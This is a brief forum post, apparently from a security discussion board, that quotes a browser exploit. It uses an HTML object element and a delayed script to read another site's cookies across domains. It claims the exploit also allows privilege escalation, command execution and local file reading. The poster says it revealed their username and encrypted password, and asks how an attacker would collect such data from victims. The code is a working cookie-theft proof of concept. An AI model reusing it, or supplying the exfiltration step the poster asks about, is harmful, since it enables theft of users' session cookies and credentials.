Ok, here is the code that does it:
You can also use this exploit for elevating privileges, arbitrary command execution, local file reading, stealing arbitrary cookies, etc.

Code:
<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.href = "http://www.antionline.com";
setTimeout("alert(ref.cookie)",5000);
</script>
I tried the code to read a different cookie besides AO and it showed me my username and encrypted password. Ok, scary, but my real question is: what good is this if it shows on my screen? How do the webmasters or email authors get the information if it is shown on the computer of the person who reads the mail or views the page?